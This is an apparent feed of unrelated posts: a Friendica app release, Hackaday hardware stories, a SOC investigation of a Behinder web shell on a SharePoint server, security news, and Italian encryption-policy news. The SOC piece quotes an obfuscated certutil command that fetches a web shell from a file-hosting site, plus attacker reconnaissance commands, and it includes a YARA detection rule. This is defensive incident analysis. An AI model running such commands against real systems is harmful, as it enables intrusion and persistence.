@RaccoonForFriendica version 0.4.1 has been finally released! I was waiting to fix a couple of old issues but I realized I was keeping people waiting too much since almost 2 months had passed since the previous stable version.
If you were on the latest beta, the only new feature is the possibility to see in every timeline the "source platform" each post is coming from (Friendica, Mastodon, Lemmy, Misskey/Sharkey, Pleroma/Akkoma, Kbin/Mbin, WordPress, GNU Social, Pixelfed, Peertube, GoToSocial, Diaspora, generic ActivityPub and more are coming).
If you were using 0.4.0 there are a ton of improvements, the most important of which are:
feat: add per-user rate limits;
feat: suggest hashtags while typing;
feat: swipe navigation between posts;
feat: exclude stop words from timelines;
feat: add shortcuts to other instances ("guest mode");
feat: open post detail as thread;
feat: post translation;
feat: followed hashtag indication;
feat: show source protocol for posts;
enhancement: support for embedded images.
This version is also available in the production track on Google Play, so you don't have to participate in the beta program any more to get it.
Let me know what you think about it, enjoy your weekend and as always #livefasteattrash
@๐ป๐๐๐๐ ๐ฆ๐ง๐ปโ๐ป๐ @RaccoonForFriendica Yeah, filters! ๐ Btw, is it intended that Raccoon is not restorable with Neo Backup? After restore it crashes after launch. Not sure why, didn't have time to have a look at logcat.
@Jonas โ no, not intended... I think you discovered a "feature" ๐๐๐ if you manage to read the logcat it would be helpful. Since it crashes at startup I don't think enabling bug reports with Sentry will produce anything beneficial, because it may happen before SDK initialization.
Ok seen it. It is due to encrypted shared preferences (used to store on device your auth token). It fails to open after you restore the app, probably due to failure to decrypt them because the key changes when you reinstall it. I'll investigate more to see if there are workarounds.
Lego! Itโs a fun toy that is popular around the world. What you may not realize is that itโs also made to incredibly high standards. As it turns out, the humble building blocks are good enough to build a interferometer if youโre so inclined to want one. [Kyra Cole] shows us how itโs done.
The build in question is a Michelson interferometer; [Kyra] was inspired to build it based on earlier work by the myphotonics project. She was able to assemble holders for mirrors and a laser, as well as a mount for a beamsplitter, and then put it all together on a Lego baseboard. While some non-Lego rubber bands were used in some areas, ultimately, adjustment was performed with Lego Technic gears.
Not only was the Lego interferometer able to generate a proper interference pattern, [Kyra] then went one step further. A Raspberry Pi was rigged up with a camera and some code to analyze the interference patterns automatically.
[Kyra] notes that using genuine Lego bricks was key to her success. Their high level of dimensional accuracy made it much easier to achieve her end goal. Sloppily-built knock-off bricks may have made the build much more frustrating to complete.
We donโt feature a ton of interferometer hacks around these parts. However, if youโre a big physics head, you might enjoy our 2021 article on the LIGO observatory. If youโre cooking up your own physics experiments at home, donโt hesitate to drop us a line!
Web shells have evolved far beyond their original purpose of basic remote command execution, and many now function more like lightweight exploitation frameworks. These tools often include features such as in-memory module execution and encrypted command-and-control (C2) communication, giving attackers flexibility while minimizing their footprint.
This article walks through a SOC investigation where efficient surface-level analysis led to the identification of a web shell associated with a well-known toolset commonly associated with Chinese-speaking threat actors. Despite being a much-discussed tool, it is still used by the attackers for post-exploitation activities, thanks to its modular design and adaptability. Weโll break down the investigative process, detail how the analysts uncovered the web shell family, and highlight practical detection strategies to help defenders identify similar threats.
Onset
Itโs early Monday morning, almost 4am UTC time, and the apparent nighttime calm inside the SOC is abruptly interrupted by an alert from our SIEM. It indicates that Kaspersky Endpoint Securityโs heuristic engine has detected a web shell (HEUR:Backdoor.MSIL.WebShell.gen) on the SharePoint server of a government infrastructure in Southeast Asia, a warning that no SOC analyst would want to ignore. C:\Windows\System32\inetsrv\w3wp.exe -ap "SharePoint" [...] โโโ "cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il -u""""r""""l""""c""""a""""c""""h""""e"""" -split -f hxxps://bashupload[.]com/[REDACTED]/404.aspx 404.aspx โโโ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\[REDACTED]\[REDACTED]\App_Web_404.aspx.[REDACTED].[REDACTED].dll The night shift team springs into action, knowing that the web shell could be the beginning of much worse activity, and that every second counts. Initial analysis of the telemetry suggests that the attackers exploited the affected web server, either by taking advantage of another web shell or a command injection vulnerability.
From the listing above, where the process tree that triggered the first detection is reported, it is possible to observe an attempt to deploy a web shell disguised as a 404 page. The certutil utility was used to download the ASPX payload, which was hosted by abusing Bashupload. This web service, which is used to upload files from the command line and allows one-time downloads of samples, is no stranger to being abused as an ingress tool transfer technique.
As is common practice, the command has been slightly obfuscated by using escape characters (such as ^ and โ) to break up the keywords โcertutilโ and โurlcacheโ in order to bypass basic detection rules based on simple pattern matching. As part of our MDR service, we are required to operate within pre-established boundaries that are tailored to the customerโs business continuity needs and risk tolerance. In this case, the customer retains ownership of decisions regarding sensitive assets, including the isolation of compromised hosts, so we canโt instantly block the attack and must continue to observe and perform a preliminary threat analysis.
A manual reconnaissance and discovery activity by an operator starts appearing, and despite the tension, an occasional typo (โlocalgorupโ) manages to draw a smile: whoami net user query user net localgorup administrators net localgroup administrators whoami /all "cmd.exe" /c cd /d "[REDACTED]"&,;;;,@cer^t^u^t^il[...]
Aftermath
To gain system privileges, the threat actors used several variants of the well-known Potato tools, either as memory-only modules or as standalone executables: Paths: C:\ProgramData\DRM\god.exe C:\Users\Default\Videos\god.exe MD5: 0xEF153E1E216C80BE3FDD520DD92526F4 Description: GodPotato
Process: C:\Windows\System32\inetsrv\w3wp.exe MD5 (memory region): 0xB8A468615E0B0072D2F32E44A7C9A62F Description: BadPotato Original filename: BadPotato.dll MD5 (memory region): 0xB5755BE4AAD8D8FE1BD0E6AC5728067B Description: SweetPotato Original filename: SweetPotato.dll To bring standalone binaries into the environment, the attackers again used the Bashupload free web service, which we saw in the initial web shell alert. Of all the tools, the GodPotato standalone binary ultimately succeeded in gaining system privileges.
With elevated access, the attackers moved on to domain trust enumeration, mapping relationships between domains and identifying potential targets for lateral movement. But letโs get back to the main question: What kind of web shell are we dealing with here?
Identifying the threat
Unfortunately, we were unable to retrieve the web shell sample used during the initial access phase. However, starting with the privilege escalation phase, several .NET modules began to appear in the memory of the IIS worker process ( w3wp.exe), ranging from popular tools like Potato to other lesser known ones. One set of libraries in particular caught our attention, so we decided to investigate further by performing a manual inspection. Fortunately, the libraries were not obfuscated and lent themselves to quick static analysis:
Example of a library detected in IIS process memory (0x0B593115C273A90886864AF7D4973EED)
In the image above, if you look at the orange method names in the Assembly Explorer on the left, you can observe some peculiarities that can be used to identify similar samples. Although many of the methods names are very generic, there is one that is quite unique, EnjsonAndCrypt. A quick Google search of this name yields no results, which means it may be sample-specific. The getExtraData method is also interesting: although it has a non-specific name, there is a sequence of bytes [126, 126, 126, 126, 126, 126] that is used to parse key:value pairs whose value is base64 encoded: The โextraDataโ structure example
Threat actors need to use the same byte sequence if they want to maintain backward compatibility across different implant versions, but since it is also very generic, we should combine both indicators, the getExtraData name and this byte array, to define a sufficiently precise detection condition that can be used in conjunction with EnjsonAndCrypt to create a detection rule.
Uncovering modules and variants
By feeding our newly created YARA rule to a multi-AV platform such as VirusTotal, we can identify additional samples that differ from those observed in the targeted infrastructure. It is worth noting that some of these have a poor detection rate:
Below are the most common names of libraries that match the rule: BShell.dll BasicInfo.dll Cmd.dll Database.dll Echo.dll Eval.dll FileOperation.dll Hs.dll LoadNativeLibrary.dll Loader.dll Plugin.dll PortMap.dll RealCMD.dll RemoteSocksProxy.dll ReversePortMap.dll SocksProxy.dll Transfer.dll Utils.dll Module filenames
Those familiar with the toolkit used may have already identified it by looking at these filenames, but if not, it is also possible to infer the relationship by simply pivoting to the samples available on VT:
Sample FC793D722738C7FCDFE8DED66C96495B relations on VT
Behinder, also known as Rebeyond, Ice Scorpion, ๅฐ่ (Bฤซng xiฤ), is known as a cross-platform web shell designed to be compatible with most popular web servers running PHP, Java or ASP.NET as in our investigation. Although the web shell sample itself is very lightweight and somewhat basic, the tool includes a powerful GUI for operators with numerous capabilities including loading additional modules and giving them full control over compromised environments.
Its built-in AES-encrypted communication allows threat actors to maintain stealthy control over a compromised web server, often bypassing traditional network detection mechanisms, and its modular, flexible nature allows malicious actors to use it as a base for customization even though it is only available as a pre-built tool on GitHub. Moreover, the presence of several step-by-step Chinese language tutorials on CSDN (Chinese Software Developer Network) makes it widely accessible to opportunistic bad actors.
The bigger picture
Taking a step back, the relationship between the memory artifacts observed on the customerโs server during the post-exploitation phase and the web shell source code becomes evident. The web shell is not just a foothold, itโs a fully functional backdoor that facilitates encrypted communication with the operatorsโ infrastructure, allowing them to call built-in or custom-loaded libraries, deploy additional tools, conduct reconnaissance and exfiltrate data while remaining hidden:
ASPX web shell side by side with .NET payload
Although the Behinder web shell has been widely discussed in the past, especially the PHP and JSP variants, it is still a current and evolving cyberweapon. Even if attackers make mistakes or act carelessly by reusing the same encryption keys or exhibiting the same patterns, we canโt afford to let our guard down. In the incident described in this article, if we had not taken the time to dig deeper into the artifacts observed in memory, we likely would have missed the toolkit altogether.
Threats evolve quickly, and signature-based malware detection only catches what we already know. Underestimating the potential of memory-based payloads can lead to a false sense of security. Teams may assume that if they havenโt detected any suspicious files, they are safe, when in fact threats may be actively operating in memory.
For SOC teams, continuous learning, proactive threat hunting, and refining detection techniques are essential to staying ahead of adversaries.
Happy hunting and see you on the next mission!
YARA rule
rule dotnetFrozenPayload { strings: $CorDllMain_mscoree_dll = {00 5F 43 6F 72 44 6C 6C 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00} $EnjsonAndCrypt = {00 45 6E 6A 73 6F 6E 41 6E 64 43 72 79 70 74 00} $getExtraData = {00 67 65 74 45 78 74 72 61 44 61 74 61 00} $extraDataMagicArray = {00 7E 7E 7E 7E 7E 7E 00} //0x00, byte[] {126, ...,}, 0x00 condition: uint16(0) == 0x5A4D and filesize < 400000 and $CorDllMain_mscoree_dll and ( $EnjsonAndCrypt or ( $getExtraData and $extraDataMagicArray ) ) }
River tables are something weโve heard decried as a passรฉ, but weโre still seeing some interesting variations on the technique. Take this example done with bronze instead of epoxy.
Starting with two beautiful slabs of walnut, [Burls Art] decided that instead of cutting them up to make guitars he would turn his attention to a river table to keep them more intact. Given the price of copper and difficulty in casting it, he decided to trim the live edges to make a more narrow โriverโ to work with for the project.
Since molten copper is quite toasty and wood likes to catch on fire, he wisely did a rough finish of the table before making silicone plugs of the voids instead of pouring metal directly. The silicone plugs were then used to make sand casting molds, and a series of casting trials moving from copper to bronze finally yielded usable pieces for the table. In case that all seems too simple, there were then several days of milling and sanding to get the bronze and walnut level and smooth with each other. The amount of attention to detail and plain old elbow grease in this project is impressive.
If youโve ever seen those cheap LED fiber optic wands at the dollar store, youโve probably just thought of them as a simple novelty. However, as [Ancient] shows us, you can turn them into a surprisingly nifty little display if youโre so inclined.
The build starts by removing the fiber optic bundle from the wand. One end is left as a round bundle. At the other end, the strands are then fed into plastic frames to separate them out individually. After plenty of tedious sorting, the fibers are glued in place in a larger rectangular 3D-printed frame, which holds the fibers in place over a matrix of LEDs. The individual LEDs of the matrix light individual fibers, which carry the light to the round end of the bundle. The result is a tiny little round display driven by a much larger one at the other end.
[Ancient] had hoped to use the set up for a volumetric display build, but found it too fragile to be fit for purpose. Still, itโs interesting to look at nonetheless, and a good demonstration of how fiber optics work in practice. As this display shows, you can have two glass fibers carrying completely different wavelengths of light right next to each other without issue.
Weโve featured some other great fiber optic hacks over the years, like this guide on making your own fiber couplings. Video after the break.
Fluid simulations are a key tool in fields from aerospace to motorsports and even civil engineering. They can be three-dimensional and complicated and often run on supercomputer clusters bigger than your house. However, you can also do simple two-dimensional fluid simulations on very simple hardware, as [mircemk] demonstrates.
This build is almost like a simple toy that displays particles rolling around and tumbling as you turn it one way or the other. Behind the scenes, an ESP32 is running the show, simulating a group of particles responding to gravity in a fluid-like manner. The microcontroller is hooked up with an 3-axis gyroscope and accelerometer, which it uses to track motion and influence the motion of the particles in turn. The results of the simple fluid simulation are displayed on a screen made up of a 16 x 16 matrix of WS2812B addressable RGB LEDs, which add enough color to make the build suitably mesmerizing.
Thereโs something compelling about turning the display and watching the particles tumble and flow, particularly when theyโre all set to different colors. [mircemk] also gave the build the ability to operate in several different modes, running โsand,โ โliquidโ and โgasโ simulations and with dynamic coloring to boot.
The original locking wheel. Shopping carts are surprisingly expensive. Prices range up to about $300 for a cart, which may seem like a lot, but they have to be pretty rugged and are made to work for decades. Plastic carts are cheaper, but not by much.
And carts have a way of vanishing. Weโve seen estimates that cart theft costs hundreds of millions of dollars worldwide annually. To stem the tide, stores sometimes pay a reward to people to round up carts off the street and return them to the store โ itโs cheaper than buying a new one. That led [Elmer Isaacks] to patent a solution to this problem in 1968.
The [Isaacks] system used lots of magnets. A cart leaving the store had a brake that would be armed by running over a magnet. Customers were expected to follow a path surrounded by magnets to prevent the brake from engaging. If you left the track, a rod passing through the wheel locked it.
A third magnet would disarm the brake when you entered the store again. This is clever, but it has several problems. First, you have to insert magnets all over the place. Second, if someone knows how the system works, a simple magnet will hold the brake off no matter what. The original modern-style court from a 1946 paten There are some low-tech ways to stop theft, too. For example, if the store has barriers too narrow for the carts to pass, customers canโt leave the store. Thatโs not very nice if you are trying to get a weekโs worth of stuff to your car. You sometimes see poles on carts rising taller than the door, to prevent the cart from leaving the building, which, of course, has the same problem.
Some stores, particularly Aldi, require a small deposit to get a cart. You get the deposit back when you return the cart. This not only discourages theft but also cuts down on having to hire kids to round up carts in the parking lot. The problem is that the deposit is usually a low-denomination coin, so if you really want to steal a $200 shopping cart, losing a quarter is probably not much of a deterrent.
Higher Tech
Building on the [Isaacks] solution, more modern systems use a perimeter fence โ usually a wire, but sometimes magnets โ that causes the brake to engage if you roll the cart over it.
This drives the cost up and is expensive to install. Worse, if you only have one wheel lock, a smart customer could lift that wheel off the ground and bypass the virtual fence. That means you probably want two locking wheels, although that still doesnโt preclude a strong thief or two thieves from carrying the cart over the line. You can see a breakdown of whatโs happening in the Science Channel video below.
Smart cart locks can also help solve โpushout,โ an industry term for people filling a cart and walking out without paying. A properly equipped cart can determine if it exits the store without going through a checkout line. This is probably error-prone and not foolproof, but it might stop many pushouts.
Many common carts use 7.8 kHz signals on the sensing wire. Since thatโs within the range of audio, you can actually hack them pretty easily.
A DEFCON presentation shows how you can use your phone to lock and unlock shopping carts. Not that we suggest you do that. As [Joseph Gabay] notes: โI never really wanted a shopping cart, butโฆI have the knowledge that if I wanted a shopping cart, I could have one.โ His video below shows many of the internal details of some of the common shopping cart systems.
Youโd think a shopping cart was about the simplest thing youโd deal with all day. But, like many things these days, it conceals some very high-tech electronics. And it seems like there should be some better options. Locking wheels might be fine when you have someone actually stealing, but if you ever have a cart lock up while you are moving quickly, it isnโt pleasant.
If you become super interested in shopping carts, the National Museum of American History has a section of shopping carts. Why not? People get obsessed with strange things. If the modern system seems familiar, maybe you are thinking of invisible doggie fences. If you want to hack a cart, you probably want to buy your own to start with.
This week, Hackadayโs Elliot Williams and Kristina Panos met up in a secret location with snacks to bring you the latest news, mystery sound, and of course, a big bunch of hacks from the previous week.
First up in the news, and thereโs a lot of it: we announced the Hackaday Europe 2025 workshops and a few more speakers, though the big keynote announcement is still to come. In case you missed it, KiCad 9 moved up into the pro league, and finally, weโre hiring, so come join us in the dungeon.
On Whatโs That Sound, Kristina didnโt get close at all, but at least had a guess this time. Thatโs okay, though, because nobody got it right! Weโre still giving a t-shirt away to [Dakota], though, probably because Elliot has a thing for using random number generators.
Then itโs on to the hacks and such beginning with a beautiful handheld compass CNC and cyanotype prints made with resin printerโs UV light. After that, we take a look at open-source random numbers, a 3D-printed instant camera, and a couple of really cool cyberdecks. Finally, we discuss whether DOOM is doomed as the port of choice in this day and age, and kvetch about keyboards.
Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!
[Kelly Coffield] makes intake manifolds for old Ford throttle bodies for fun, demonstrating an excellent technique for making such things in the small shop. The mould patterns are CNC machined from a solid polystyrene block, with all the necessary gates to feed the aluminium into the mould. The principle is to introduce aluminium from a large central runner into the mould structure, which feeds the gates into the mould parts. The various foam mould components are then glued with an extra brace bar at the bottom to strengthen it. Dip coating with a refractory slurry The complete structure is then sprayed with surfactant (just plain old soapy water) and dip-coated in a refractory slurry. The surfactant adjusts the coatingโs surface tension, preventing bubbles from forming and ruining the surface quality produced by this critical coating step.
Once a satisfactory coating has been applied and hardened, the structure is placed inside a moulding pan fitted with a pneumatic turbine vibrator, to allow sand to be introduced. The vibrations ease the flow of sand into all the nooks and crannies, fully supporting the delicate mould structure against the weight of the metal, and gases produced as the foam burns away. A neat offset pouring cup is then added to the top of the structure and packed in with more sand to stabilise it. Itโs a simple setup that can easily be replicated in any hackerspace or backyard for those motivated enough. [Kelly] is using A356 aluminium alloy, but thereโs no reason this technique wonโt work for other metals.
It was amusing to see [Kelly] demould by just dumping out the whole stack onto the drive and throwing the extracted casting into a snow bank after quenching. We might as well use all that free Midwest winter cooling capacity! After returning to the shop, [Kelly] would typically perform any needed adjustments, such as improving flatness in the press, while the part was in the โas cast temperโ condition. Weโll gloss over the admission of cutting the gates off on the table saw! After these adjustments, the part is artificially aged to a T5-like specification, to give it its final strength and machinability properties. There are plenty more videos on this process on the channel, which is well worth a look.
Now thereโs a quirk to this story. No one has been able to answer a simple yet vital question: What exactly did the theme plugin do that was malicious? The official response is that โA theming extension with heavily obfuscated code and unreasonable dependencies including a utility for running child processesโ. Looking at the official statements and unofficial security reviews, I canโt find confirmation that the plugins have actually been observed doing something malicious. The only concrete problem is that the plugin shipped obfuscated JavaScript. There are several incomplete statements about a problem with a sanity.io dependency that may have been compromised.
The conclusion at this point is that a thorough security review of these plugins has not been published. The Microsoft team found enough problematic elements in the plugins to trigger pulling them. But I join the chorus of voices calling on Microsoft to clearly answer the vital question: Have any users of Material Theme plugins actually been compromised?
Low-hanging Backups
NAKIVO backup has an interesting endpoint, the getImageByPath call thatโs used for loading the systemโs logo, and is accessible for unauthenticated users. Itโs pretty simple, just taking a path to a file on the appliance filesystem, and returning the byte array for use as an image. And of course, it doesnโt check whether the requested file is actually an image. Nor is it limited to a list of allowed paths.
So hence we essentially have an arbitrary file read. Itโs not entirely arbitrary, as the file is first loaded into memory before being served. So the backups themselves are likely too big to successfully exfiltrate in this way. There are still some rather interesting targets, including the system logs. But the real juicy target is the system database itself. Thankfully, the user credentials for the NAVIKO system itself seem to be properly hashed to avoid casual theft. But setting up useful backups will require all sorts of integrations, like SSH and AWS credentials. And those are stored in plain text inside the database. Whoops.
The logic here seems to be that not offering any end-to-end encrypted backup system for UK users is a better choice than claiming to offer such a system that actually contains a backdoor. Thatโs doubly true, as the law in question doesnโt seem to limit itself to UK users. If the UK government doesnโt back down on their extremely questionable demands, the next major step may be for Apple to pull sales from the country entirely.
Crypto Heist
We have a pair of crypto heist stories this week, with the first one being the largest in history. At a staggering $1.5 Billion, this seems like the biggest single theft of any kind to ever be successfully pulled off. And the details of how it was done are still a bit murky. The funds were stolen out of a Bybit โmultisigโ cold wallet. Those are clever currency stores that actually include smart contracts in the storage mechanism, requiring multiple owners to sign off on transactions.
Itโs believed that this hack was pulled off by North Korean agents, through the use of very clever but simple techniques: Social engineering, and UI manipulation. In essence, a request for digital signature that claimed to do something benign, that actually unlocked the funds for theft. Some things never seem to change.
And thatโs not all thatโs happening with Cryptocurrency these days. It turns out that thereโs another dead-simple attack that is targeting job-seeking individuals, instead of huge companies. โWe may have a job for you, go to this website and run this application to apply!โ Rather than a legitimate videoconferencing or interviewing application, the download is a simple backdoor. Itโs used primarily to find crypto wallets and siphon the funds out.
Wallbleed
Remember Heartbleed? Thatโs the glitch in OpenSSL from 2014, where the TLS heartbeat implementation could trivially leak large amounts of system memory. Wallbleed is a strangely similar bug in the implementation of the Chinese Great Firewall system. One way the Great Firewall does censorship is via DNS injection. Request the DNS information for a blocked domain, and the firewall will intercept that request in real time, and return a spoofed response with a bogus IP address for the requested domain. Importantly for this discussion, that spoofing is bi-directional. You can send DNS requests to Chinese IP addresses, and get spoofed responses from the Great Firewall.
DNS request and response packets use an interesting variable length transport system, where the domain name being requested is turned into a set of length-value pairs. example.com is represented as 07example03com00. 7 bytes for the domain, then 3 bytes for the TLD, and a terminating null. Many of us are immediately wondering, what happens if that query was packed incorrectly: 07example20com00? There arenโt actually 20 bytes in the query, so what do various DNS responders do when handed such a query? Well-written DNS servers recognize that this is garbage, and just drop the packet. Some of the great firewall infrastructure did something far more interesting. It spoofs the DNS response, and performs a buffer over-read when constructing the response. Yes, leaking a few bytes of raw system memory back to the requester, a la Heartbleed.
And when we say โa few bytesโ, the maximum observed leakage in a single spoofed response was 125. As you might imagine, thatโs quite a bit of data. Enough data, in fact, to learn quite a bit about the Great Firewall and what sort of traffic it sees. There were also what appeared to be x86_64 pointers and Linux stack frames.
This attack was first discovered by researchers in 2021 and finally completely fixed in March 2024. In the intermediate time, those researchers used the vulnerability quite heavily to mine the Great Firewall infrastructure for data. This is an interesting ethical question. Normally itโs considered completely unacceptable to weaponize a vulnerability beyond whatโs needed as a proof of concept. The Great Firewall is in some ways an adversarial device, making exploitation a bit murkier. On the other hand, vulnerabilities like this a usually disclosed in order to get them fixed. What is a researcherโs responsibility in this case, when the vulnerability is in a censorship device? It seems the Chinese authorities discovered the Wallbleed vulnerability themselves, excusing researchers from needing to fully answer this particular ethical question.
Bits and Bytes
Itโs not surprising to open up an electronic device, and find an ugly glob of potting compound spread over one or several of the key chips inside. Or for some devices, the compound is ubiquitous, covering everything. [Graham Sutherland] has some thoughts on how to defeat the stuff. And while some is obvious, like using a drill press to very carefully expose a target interface, there are some really inventive ideas I would never have considered, like throwing an entire board into a pressure cooker for an hour!
How long does it take for a cyber criminal to go from initial access on an internal machine, to full access to a privileged computer? In the ReliaQuest case, it was 48 minutes. The hack was simple and clever. Start a mass spam and phishing campaign, and then pose as a helpful IT worker who could help end the carnage. All it takes is one employee to fall for the fake help desk routine, and 48 minutes.
Letโs say you wanted to pirate music from a streaming service like Deezer, but you really didnโt want your IP address or machine associated with the piracy. What would you do? Use Tor? VPNs? How about create a malicious PyPi package that does your downloading for you. That seems to be the bizarre case of automslc, a reasonably popular package that secretly downloads and scrapes from the music platform.
La Francia si sta preparando ad approvare leggi che potrebbero rivoluzionare la sicurezza online, obbligando i fornitori di servizi di telecomunicazioni a installare backdoor nelle app di messaggistica crittografata e limitando lโaccesso alle risorse Internet tramite VPN. Lโiniziativa ha suscitato aspre critiche da parte di Tuta (ex Tutanota) e della VPN Trust Initiative (VTI).
Il primo disegno di legge controverso รจ un emendamento alla legge francese sul narcotraffico, che impone ai servizi di comunicazioni criptate di fornire alle forze dellโordine i messaggi decriptati dei sospettati entro 72 ore dalla richiesta. Il mancato rispetto degli obblighi comporterร sanzioni fino a 1,5 milioni di euro per le persone fisiche e fino al 2% del fatturato globale annuo per le aziende. Sebbene la legge non sia ancora entrata in vigore, รจ giร stata approvata dal Senato francese e passerร allโesame dellโAssemblea nazionale.
Tuta ha chiamato i parlamentari che hanno respinto lโemendamento, sostenendo che indebolire la crittografia avrebbe creato vulnerabilitร non solo per i criminali, ma anche per gli utenti comuni. Lโazienda sottolinea che, anche se la backdoor viene creata nellโinteresse delle forze dellโordine, puรฒ essere utilizzata da criminali informatici e agenzie governative. Tuta ha sottolineato che tali iniziative violano le leggi dellโUE sulla protezione dei dati (GDPR) e anche gli standard tedeschi sulla sicurezza informatica.
Contemporaneamente, in Francia si sta valutando unโaltra innovazione: lโobbligo per i servizi VPN di bloccare lโaccesso ai siti pirata. La holding mediatica Canal+ e la Lega calcio francese (LFP) hanno lanciato unโiniziativa in tal senso, chiedendo ai provider Internet e ai servizi VPN di limitare lโaccesso a determinate risorse web.
VPN Trust Initiative (VTI), che include AWS, Google, Cloudflare, Namecheap, OVH, IPVanish VPN, Ivacy VPN, NordVPN, PureVPN ed ExpressVPN, ha condannato una mossa del genere, affermando che la lotta alla pirateria non dovrebbe portare alla censura e alla violazione dei diritti degli utenti. Nella sua lettera aperta, lโorganizzazione ha tracciato parallelismi tra lโiniziativa e le restrizioni imposte a Internet in altri paesi, tra cui Cina, Myanmar e Iran, sottolineando che tali misure costituiscono un precedente per la censura di massa.
La Francia non รจ lโunico Paese in cui il controllo sui dati Internet sta aumentando. Nel Regno Unito, il governo ha recentemente richiesto da Apple di fornire lโaccesso ai backup crittografati di iCloud. In risposta, lโazienda ha spento lโopzione di crittografia end-to-end per gli utenti del Regno Unito. In Svezia รจ in preparazione un disegno di legge che obbligherร i messaggeri Signal e WhatsApp creare backdoor tecniche per fornire lโaccesso ai messaggi crittografati.
Di recente รจ emersa anche la notizia che il capo dellโEuropol Catherine De Bolle vuole collaborare con le principali aziende tecnologiche per ampliare la cooperazione con le forze dellโordine sulle questioni relative alla crittografia. A suo avviso, il rifiuto di tale interazione potrebbe rappresentare una minaccia per la democrazia europea.
La Procura generale belga ha avviato unโindagine su una fuga di dati del Servizio di sicurezza dello Stato (VSSE) presumibilmente effettuata da hacker cinesi. Secondo quanto riferito, i criminali informatici hanno avuto accesso al server di posta elettronica esterno di VSSE tra il 2021 e maggio 2023, intercettando circa il 10% di tutte le e-mail inviate e ricevute dai dipendenti del dipartimento.
Il server compromesso รจ stato usato per comunicare con la procura, i ministeri, le forze dellโordine e altri enti governativi. Inoltre, questo server รจ stato utilizzato da discussioni interne, che ha potenzialmente portato alla fuga di dati personali di dipendenti e candidati, compresi i loro curriculum e documenti di identitร .
Il primo segnale dellโattacco รจ stato rilevato nel 2023, quando i media belgi hanno segnalato un incidente, che ha coinciso con la divulgazione di una vulnerabilitร nei prodotti Barracuda. In seguito a ciรฒ, VSSE ha smesso di utilizzare le soluzioni aziendali e ha raccomandato ai dipendenti di sostituire i documenti per ridurre il rischio di frode di identitร .
Tuttavia, secondo fonti anonime, al momento non ci sono prove che i dati rubati siano apparsi sul darknet o siano stati utilizzati a fini di estorsione. Gli specialisti della sicurezza VSSE continuano a monitorare i forum underground e le piattaforme di trading alla ricerca di tracce e a potenziale fughe di dati. A peggiorare la situazione, lโattacco informatico รจ avvenuto in un momento in cui lโorganizzazione era impegnata in unโimportante campagna di assunzioni.
La VSSE ha rifiutato di rilasciare dichiarazioni, confermando solo che รจ stata presentata una denuncia formale in merito allโincidente. Allo stesso tempo, la Procura federale belga ha dichiarato che lโindagine รจ iniziata nel novembre 2023, ma รจ ancora troppo presto per trarre conclusioni. Lโambasciata della Cina in Belgio ha respinto le accuse, affermando che le autoritร belghe non avevano fornito prove convincenti.
Si ritiene che lโattacco alla VSSE sia stato effettuato utilizzando una vulnerabilitร Zero-Day nei Gateway di sicurezza della posta elettronica Barracuda (ESG). Nel 2023, gli specialisti Mandiant hanno attribuito attacchi mirati al gruppo UNC4841 che lavora per conto del governo cinese.
Microsoft ha rimosso due estensioni popolari, Material Theme โ Free e Material Theme Icons โ Free, da Visual Studio Marketplace, in quanto sospettate di contenere codice dannoso.
In totale, queste estensioni sono state scaricate quasi 9 milioni di volte e ora gli utenti ricevono avvisi che indicano che le estensioni sono state disattivate automaticamente. Il loro editore, Mattia Astorino (alias equinusocio), ha diverse altre estensioni nel Visual Studio Marketplace, con un totale complessivo di oltre 13 milioni di installazioni. Le informazioni secondo cui le estensioni potrebbero essere dannose provengono dai ricercatori di sicurezza informatica Amit Assaraf e Itay Kruk. Nel loro rapporto gli esperti hanno affermato di aver trovato codice sospetto nelle estensioni e di aver segnalato le loro scoperte a Microsoft.
I ricercatori sottolineano che il codice dannoso รจ stato iniettato nellโestensione tramite un aggiornamento, il che potrebbe indicare un attacco alla supply chain tramite una dipendenza o una compromissione dellโaccount dello sviluppatore. Un altro campanello dโallarme era la presenza di codice JavaScript fortemente offuscato nei file release-notes.js.
โMicrosoft ha rimosso entrambe le estensioni dal marketplace di VS Code e bannato il loro sviluppatoreโ,ha detto un dipendente Microsoft a YCombinator. โ Uno dei membri della community ha effettuato unโanalisi approfondita della sicurezza di queste estensioni e ha trovato molti โsegnali dโallarmeโ che indicavano intenti malevoli, per poi segnalarcelo. I ricercatori di sicurezza Microsoft hanno confermato queste affermazioni e hanno trovato ulteriore codice sospetto. Abbiamo bandito lโeditore da VS Marketplace, rimosso tutte le sue estensioni e disinstallato tutte le istanze di VS Code che eseguivano tali estensioni. Per essere chiari, la rimozione non ha nulla a che fare con il copyright o con la licenza, ma solo con potenziali intenti malevoliโ. Microsoft ha promesso di pubblicare a breve informazioni piรน dettagliate sullโattivitร dannosa nel repository VSMarketplace su GitHub.
Lo sviluppatore dellโestensione, Mattia Astorino, ha risposto alle domande sui potenziali pericoli delle estensioni affermando che i problemi erano causati da una dipendenza obsoleta di sanity.io che โsembra essere compromessaโ. Secondo lui, non cโรจ mai stato nulla di dannoso nel Material Theme e lโunico problema era una dipendenza obsoleta di sanity.io, โche veniva utilizzata per visualizzare le note di rilascio del CMS headless sanityโ.
โQuesta dipendenza esiste dal 2016 e ha superato con successo tutti i controlli, ma ora sembra compromessa. Nessuno di Microsoft ci ha contattato per rimuoverlo. Hanno appena distrutto tutto, causando problemi a milioni di utenti e causando il blocco di VSCode (sรฌ, รจ colpa loro). Hanno rotto tutto senza mai chiederci spiegazioni, scrive Astorino. โ Rimuovere la vecchia dipendenza รจ stato un lavoro da 30 secondi, ma sembra che sia cosรฌ che funziona Microsoft. Inoltre, forniamo un file index.js offuscato che contiene tutti i comandi e la logica del tema. ร offuscato perchรฉ lโestensione รจ ora closed source. Se la rimuovi, lโestensione continuerร a funzionare con i normali file JSON.โ
Finchรฉ la situazione non sarร chiarita, si consiglia agli utenti di rimuovere i seguenti file da tutti i progetti:
๐ฃ Dal 12 al 14 marzo 2025 si svolgerร lโottava edizione di Didacta Italia a Firenze, presso la Fortezza da Basso! Il #MIM sarร presente allโimportante appuntamento dedicato alla formazione e allโinnovazione scolastica con oltre 130 eventi, organizzatโฆ
